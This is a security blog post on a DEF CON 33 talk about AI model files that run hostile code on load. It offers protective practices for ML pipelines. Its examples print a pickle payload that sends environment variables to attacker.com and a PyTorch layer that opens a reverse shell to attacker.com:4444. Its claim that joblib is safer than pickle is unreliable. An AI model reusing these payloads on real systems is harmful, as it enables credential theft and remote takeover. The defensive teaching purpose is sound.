Loading Models, Launching Shells: The Hidden Dangers of AI File Formats

August 22, 2025

TLDR: AI model files can execute malicious code when loaded, turning your ML pipeline into an attack vector. Security researcher Cyrus Parzian demonstrated at DEF CON 33 how popular AI frameworks blindly execute code embedded in model files. This isn’t about sophisticated exploits - it’s about the fundamental design of AI model formats that prioritize convenience over security. Essential reading for DevOps, ML engineers, and security architects deploying AI systems.

The Threat: Your Model Is More Than Data

You download a state-of-the-art language model from a popular repository. You load it into your production system using PyTorch or TensorFlow. The model performs perfectly. Behind the scenes, it’s also executing malicious code, exfiltrating your data, and establishing persistence in your infrastructure.

This isn’t science fiction. At DEF CON 33, security researcher Cyrus Parzian demonstrated how AI model files have become the perfect trojan horses, exploiting the trust relationship between developers and their models.

Understanding AI Model Formats: More Than Weights and Biases

Modern AI models aren’t just collections of mathematical weights. They’re complex packages containing:

Model Architecture: Code defining how the model processes data Weights and Parameters: The trained values that make the model work Preprocessing Logic: Code that transforms input data Custom Layers: Arbitrary Python code for specialized functionality Metadata: Information about training, versioning, and dependencies

Popular formats like PyTorch (.pth), TensorFlow SavedModel, Pickle (.pkl), and Hugging Face models all support embedding executable code alongside model data. This design choice prioritized developer convenience over security.

The Security Flaw: Execution by Default

When you load an AI model, frameworks often execute any embedded code automatically. This happens because:

Serialization Formats: Python’s pickle module, used extensively in ML, can execute arbitrary code during deserialization Custom Layers: Models can define custom neural network layers with embedded Python code Preprocessing Hooks: Models can include data transformation code that runs before inference Dynamic Loading: Frameworks dynamically import and execute model-defined modules

How the Attack Works

Step 1: Model Poisoning Attackers create or modify legitimate models, embedding malicious code in custom layers or serialization data.

Step 2: Distribution Poisoned models are uploaded to model repositories, shared via collaboration platforms, or distributed through supply chain compromises.

Step 3: Innocent Loading Developers load the model using standard framework APIs like torch.load() or tf.saved_model.load().

Step 4: Silent Execution The malicious code executes with the same privileges as the ML application, often in production environments with extensive access.

Step 5: Persistence and Exfiltration Attackers establish backdoors, steal training data, modify model behavior, or pivot to other systems.

Why This Is Catastrophic

Universal Trust Model ML practitioners routinely load models from untrusted sources, treating them as data rather than executable code.

Production Impact Models are often loaded in high-privilege environments with access to sensitive data, cloud credentials, and internal networks.

Detection Challenges

Malicious code can be obfuscated within model parameters
Execution happens during normal model loading operations
Traditional security tools don’t inspect model file contents
Behavioral changes may be subtle and delayed

Supply Chain Amplification A single poisoned model can compromise every system that loads it, creating massive supply chain attacks.

Real-World Impact

DevOps and Infrastructure Risks

Container Compromise Models loaded in containerized environments can escape containers, access host systems, and spread laterally.

Cloud Account Takeover ML workloads often run with broad cloud permissions, enabling attackers to access storage, databases, and other services.

CI/CD Pipeline Compromise Automated model training and deployment pipelines become attack vectors for compromising development infrastructure.

Credential Theft Models can access environment variables, configuration files, and secret management systems.

AI/ML Engineering Risks

Training Data Theft Malicious models can exfiltrate proprietary training datasets, violating privacy and intellectual property.

Model Backdoors Attackers can subtly modify model behavior, creating backdoors that activate under specific conditions.

Research Integrity Compromised models can produce biased or incorrect results, undermining research validity.

Competitive Intelligence Model architectures and hyperparameters can be stolen, revealing competitive advantages.

Security Architecture Risks

Defense Evasion Malicious code in models can disable security tools, modify logs, or establish covert channels.

Privilege Escalation Model loading often requires elevated permissions, providing attackers with initial access for further exploitation.

Data Exfiltration Models can access and transmit sensitive data, bypassing traditional data loss prevention controls.

Lateral Movement Compromised ML systems can become pivot points for attacking other network resources.

Technical Explanation: The Mechanics of Model Exploitation

Pickle Deserialization Attacks

Python’s pickle format is inherently unsafe. When loading pickled data, Python executes any code embedded in the serialization stream:

# Malicious pickle payload
import os
import pickle

class MaliciousPayload:
    def __reduce__(self):
        return (os.system, ('curl -X POST attacker.com/exfil -d "$(env)"',))

# This executes the payload when unpickled
malicious_data = pickle.dumps(MaliciousPayload())
pickle.loads(malicious_data)  # Shell command executes here

Custom Layer Exploitation

PyTorch and TensorFlow allow custom layers with arbitrary Python code:

import torch
import torch.nn as nn

class BackdoorLayer(nn.Module):
    def __init__(self):
        super().__init__()
        # Malicious code executes during layer initialization
        os.system("python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"attacker.com\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"])'")
    
    def forward(self, x):
        return x  # Normal functionality preserved

SavedModel Exploitation

TensorFlow SavedModel format can include custom operations and preprocessing functions:

# saved_model.pb contains references to malicious Python modules
# When loaded, TensorFlow automatically imports and executes the code
import tensorflow as tf

# This loads and executes embedded code
model = tf.saved_model.load('malicious_model/')

Protection Strategies

Immediate Actions

1. Model Source Validation

Only use models from trusted, verified sources
Implement model signing and verification processes
Maintain an approved model registry
Audit model provenance and supply chain

2. Sandboxed Model Loading

Load models in isolated environments without network access
Use containers with minimal privileges and no host access
Implement resource limits to prevent system exhaustion
Monitor file system and network activity during model loading

3. Static Analysis

Scan model files for embedded code before loading
Use tools like pickle-inspector to analyze pickle contents
Implement automated model security scanning in CI/CD pipelines
Validate model file integrity with checksums and signatures

Technical Safeguards

Safe Loading Practices

# Avoid unsafe loading methods
# NEVER DO THIS:
model = torch.load('untrusted_model.pth')  # Unsafe!
model = pickle.load(open('model.pkl', 'rb'))  # Unsafe!

# Use safer alternatives:
model = torch.load('model.pth', weights_only=True)  # PyTorch 1.13+
model = joblib.load('model.pkl')  # Safer than pickle for ML models

# For TensorFlow, use signature validation:
model = tf.saved_model.load('model/', tags=['serve'])

Environment Isolation

# Use dedicated model loading containers
docker run --rm --network=none --read-only \
  -v /models:/models:ro \
  -v /output:/output:rw \
  ml-sandbox:latest python load_model.py

# Implement AppArmor/SELinux policies for ML processes
# Use seccomp to restrict system calls

Model Validation Pipeline

import hashlib
import subprocess

def validate_model(model_path, expected_hash):
    # Verify file integrity
    with open(model_path, 'rb') as f:
        actual_hash = hashlib.sha256(f.read()).hexdigest()
    
    if actual_hash != expected_hash:
        raise SecurityError("Model hash mismatch")
    
    # Scan for malicious content
    result = subprocess.run(['model-scanner', model_path], 
                          capture_output=True, text=True)
    if result.returncode != 0:
        raise SecurityError("Model failed security scan")
    
    return True

Organizational Policies

Model Governance

Establish model approval processes with security review
Implement model lifecycle management with security checkpoints
Require security training for ML engineers and data scientists
Create incident response procedures for model compromise

Supply Chain Security

Audit model repositories and sources
Implement model signing and verification requirements
Use private model registries for internal models
Monitor for supply chain compromises affecting ML dependencies

Infrastructure Hardening

Segment ML workloads from production systems
Use least-privilege access for ML services
Implement network monitoring for ML environments
Regular security assessments of ML infrastructure

What Needs to Change

Framework-Level Fixes

Default to data-only model loading with explicit opt-in for code execution
Built-in sandboxing and mandatory model signing/verification
Integrated static analysis tools and runtime monitoring

Industry Standards

Security benchmarks for model formats and certification programs
Standardized model signing protocols and security disclosures
Security-focused repositories with mandatory scanning and automated testing tools

The Bigger Picture

Paradigm Shift Required

From Data to Code: We must treat models as executable code, not passive data From Trust to Verification: Model loading needs the same security rigor as software deployment From Convenience to Security: The ML community must prioritize security over ease of use

Broader Implications

AI Supply Chain Security: Model poisoning represents a new class of supply chain attacks ML in Production: Security practices must evolve to match the risks of production ML systems Developer Education: ML practitioners need security training specific to AI systems Regulatory Compliance: Model security may become subject to regulatory requirements

Teaching Others: Key Messages

When explaining model security risks:

Use Concrete Examples: “Loading a model file can be like running a program - it might do more than you expect.”

Emphasize Ubiquity: “Every framework and format has this problem - PyTorch, TensorFlow, scikit-learn, and others.”

Focus on Prevention: “Treat model files like executable code. Verify sources, scan contents, and use sandboxing.”

Highlight Business Impact: “A compromised model can steal data, disrupt services, and compromise entire systems.”

Conclusion: Securing the AI Revolution

Cyrus Parzian’s DEF CON 33 research exposes a fundamental security flaw in how we handle AI models. The convenience of loading arbitrary models has created massive attack surfaces that traditional security tools don’t address.

The solution requires:

Technical changes: Secure loading mechanisms and sandboxing
Process changes: Model governance and supply chain security
Cultural changes: Treating models as code, not data

As AI becomes more critical to business operations, model security must evolve from an afterthought to a foundational requirement. The future of AI depends on building security into every layer of the stack.

Remember: Every model you load is potential code execution. In the age of AI, your models are only as trustworthy as their sources.

Key Acronyms

AI - Artificial Intelligence

ML - Machine Learning

PyTorch - Open-source machine learning framework

TensorFlow - Google’s machine learning platform

DEF CON - Hacker convention where security research is presented

CI/CD - Continuous Integration/Continuous Deployment

API - Application Programming Interface

CVE - Common Vulnerabilities and Exposures

ONNX - Open Neural Network Exchange format

GPU - Graphics Processing Unit

CPU - Central Processing Unit

IoC - Indicators of Compromise

SIEM - Security Information and Event Management

SOC - Security Operations Center

YARA - Pattern matching engine for malware identification

References

Parzian, C. “Loading Models, Launching Shells: The Hidden Dangers of AI File Formats.” DEF CON 33 (2025).
PyTorch Security Documentation: https://pytorch.org/docs/stable/notes/serialization.html
TensorFlow Secure Model Loading: https://www.tensorflow.org/guide/saved_model
OWASP Machine Learning Security Top 10: https://owasp.org/www-project-machine-learning-security-top-10/
NIST AI Risk Management Framework: https://www.nist.gov/itl/ai-risk-management-framework
“Adversarial Machine Learning Threat Matrix”: https://github.com/mitre/advmlthreatmatrix
Hugging Face Model Security Guidelines: https://huggingface.co/docs/hub/security